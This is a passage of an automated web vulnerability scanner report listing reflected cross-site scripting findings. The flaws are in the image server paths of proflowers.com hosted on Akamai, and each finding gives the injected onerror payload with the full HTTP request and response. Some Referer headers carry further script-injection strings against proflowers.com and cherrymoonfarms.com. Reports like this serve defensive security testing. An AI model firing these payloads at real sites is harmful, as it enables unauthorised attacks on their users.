Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:06 GMT
Connection: close

Unable to find /ProvideCommerce/CONT215_BRR10006_MDay_11_PFda675<img src=a onerror=alert(1)>a07aa15604a

4.16. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONTR205_BRR10012_MDay_11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONTR205_BRR10012_MDay_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ce03a<img%20src%3da%20onerror%3dalert(1)>9d86da2ef7b was submitted in the REST URL parameter 9. This input was echoed as ce03a<img src=a onerror=alert(1)>9d86da2ef7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONTR205_BRR10012_MDay_11_PFce03a<img%20src%3da%20onerror%3dalert(1)>9d86da2ef7b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:07 GMT
Connection: close

Unable to find /ProvideCommerce/CONTR205_BRR10012_MDay_11_PFce03a<img src=a onerror=alert(1)>9d86da2ef7b

4.17. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/COO_SCOSPRBITBOX_BitesBx_MDY_11_FC_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/COO_SCOSPRBITBOX_BitesBx_MDY_11_FC_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 812a0<img%20src%3da%20onerror%3dalert(1)>961839e23fc was submitted in the REST URL parameter 9. This input was echoed as 812a0<img src=a onerror=alert(1)>961839e23fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/COO_SCOSPRBITBOX_BitesBx_MDY_11_FC_SQ812a0<img%20src%3da%20onerror%3dalert(1)>961839e23fc?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 113
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:17 GMT
Connection: close

Unable to find /ProvideCommerce/COO_SCOSPRBITBOX_BitesBx_MDY_11_FC_SQ812a0<img src=a onerror=alert(1)>961839e23fc

4.18. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f71af<img%20src%3da%20onerror%3dalert(1)>58e4fbecd28 was submitted in the REST URL parameter 9. This input was echoed as f71af<img src=a onerror=alert(1)>58e4fbecd28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tnf71af<img%20src%3da%20onerror%3dalert(1)>58e4fbecd28?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:26 GMT
Connection: close

Unable to find /ProvideCommerce/ContempoVase_tnf71af<img src=a onerror=alert(1)>58e4fbecd28

4.19. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_BerryTestFancy6v2_GEN_11_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_BerryTestFancy6v2_GEN_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 7d085<img%20src%3da%20onerror%3dalert(1)>7f387170b5 was submitted in the REST URL parameter 9. This input was echoed as 7d085<img src=a onerror=alert(1)>7f387170b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_BerryTestFancy6v2_GEN_11_SQ7d085<img%20src%3da%20onerror%3dalert(1)>7f387170b5?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 115
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:22 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR10006_BerryTestFancy6v2_GEN_11_SQ7d085<img src=a onerror=alert(1)>7f387170b5

4.20. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 28232<img%20src%3da%20onerror%3dalert(1)>694141eb889 was submitted in the REST URL parameter 9. This input was echoed as 28232<img src=a onerror=alert(1)>694141eb889 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_PF28232<img%20src%3da%20onerror%3dalert(1)>694141eb889?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 133
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:03 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_PF28232<img src=a onerror=alert(1)>694141eb889

4.21. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e7337<img%20src%3da%20onerror%3dalert(1)>5e353b6f9c4 was submitted in the REST URL parameter 9. This input was echoed as e7337<img src=a onerror=alert(1)>5e353b6f9c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_SQe7337<img%20src%3da%20onerror%3dalert(1)>5e353b6f9c4?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 133
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:20 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_SQe7337<img src=a onerror=alert(1)>5e353b6f9c4

4.22. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ec5f1<img%20src%3da%20onerror%3dalert(1)>20d57e53c2d was submitted in the REST URL parameter 9. This input was echoed as ec5f1<img src=a onerror=alert(1)>20d57e53c2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_PFec5f1<img%20src%3da%20onerror%3dalert(1)>20d57e53c2d?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 115
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:51 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_PFec5f1<img src=a onerror=alert(1)>20d57e53c2d

4.23. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f096f<img%20src%3da%20onerror%3dalert(1)>6fffa73ca86 was submitted in the REST URL parameter 9. This input was echoed as f096f<img src=a onerror=alert(1)>6fffa73ca86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_SQf096f<img%20src%3da%20onerror%3dalert(1)>6fffa73ca86?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 115
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:09 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_SQf096f<img src=a onerror=alert(1)>6fffa73ca86

4.24. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR30112_Mday12_MDY_11_BS_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR30112_Mday12_MDY_11_BS_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ef49c<img%20src%3da%20onerror%3dalert(1)>7e2a3d4dba7 was submitted in the REST URL parameter 9. This input was echoed as ef49c<img src=a onerror=alert(1)>7e2a3d4dba7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR30112_Mday12_MDY_11_BS_PFef49c<img%20src%3da%20onerror%3dalert(1)>7e2a3d4dba7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:04 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR30112_Mday12_MDY_11_BS_PFef49c<img src=a onerror=alert(1)>7e2a3d4dba7

4.25. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/F08_311626_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/F08_311626_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 799e8<img%20src%3da%20onerror%3dalert(1)>5150b0f3d58 was submitted in the REST URL parameter 9. This input was echoed as 799e8<img src=a onerror=alert(1)>5150b0f3d58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/F08_311626_PF799e8<img%20src%3da%20onerror%3dalert(1)>5150b0f3d58?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:07 GMT
Connection: close

Unable to find /ProvideCommerce/F08_311626_PF799e8<img src=a onerror=alert(1)>5150b0f3d58

4.26. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FD08_149362_W_2_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FD08_149362_W_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload d8768<img%20src%3da%20onerror%3dalert(1)>6cd8c2fda39 was submitted in the REST URL parameter 9. This input was echoed as d8768<img src=a onerror=alert(1)>6cd8c2fda39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FD08_149362_W_2_PFd8768<img%20src%3da%20onerror%3dalert(1)>6cd8c2fda39?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:02 GMT
Connection: close

Unable to find /ProvideCommerce/FD08_149362_W_2_PFd8768<img src=a onerror=alert(1)>6cd8c2fda39

4.27. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCHEERSMOM_Cheers_SPR_11_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCHEERSMOM_Cheers_SPR_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5df3f<img%20src%3da%20onerror%3dalert(1)>a18490b2d47 was submitted in the REST URL parameter 9. This input was echoed as 5df3f<img src=a onerror=alert(1)>a18490b2d47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCHEERSMOM_Cheers_SPR_11_SQ5df3f<img%20src%3da%20onerror%3dalert(1)>a18490b2d47?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 109
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:37 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CKMCHEERSMOM_Cheers_SPR_11_SQ5df3f<img src=a onerror=alert(1)>a18490b2d47

4.28. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCLASSIC3_ClassicFruitPlus3_SPR_11_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCLASSIC3_ClassicFruitPlus3_SPR_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b753f<img%20src%3da%20onerror%3dalert(1)>54a735179c was submitted in the REST URL parameter 9. This input was echoed as b753f<img src=a onerror=alert(1)>54a735179c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCLASSIC3_ClassicFruitPlus3_SPR_11_SQb753f<img%20src%3da%20onerror%3dalert(1)>54a735179c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 118
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:17 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CKMCLASSIC3_ClassicFruitPlus3_SPR_11_SQb753f<img src=a onerror=alert(1)>54a735179c

4.29. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMFFAVBKT_CmfFavsBsk_GEN_10_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMFFAVBKT_CmfFavsBsk_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ae9c6<img%20src%3da%20onerror%3dalert(1)>e50248b99e3 was submitted in the REST URL parameter 9. This input was echoed as ae9c6<img src=a onerror=alert(1)>e50248b99e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMFFAVBKT_CmfFavsBsk_GEN_10_SQae9c6<img%20src%3da%20onerror%3dalert(1)>e50248b99e3?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 113
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:12 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CKMCMFFAVBKT_CmfFavsBsk_GEN_10_SQae9c6<img src=a onerror=alert(1)>e50248b99e3

4.30. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMTREASBK_CmfTreasuresBsk_GEN_10_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMTREASBK_CmfTreasuresBsk_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1f963<img%20src%3da%20onerror%3dalert(1)>0abf99f1fea was submitted in the REST URL parameter 9. This input was echoed as 1f963<img src=a onerror=alert(1)>0abf99f1fea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMTREASBK_CmfTreasuresBsk_GEN_10_SQ1f963<img%20src%3da%20onerror%3dalert(1)>0abf99f1fea?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
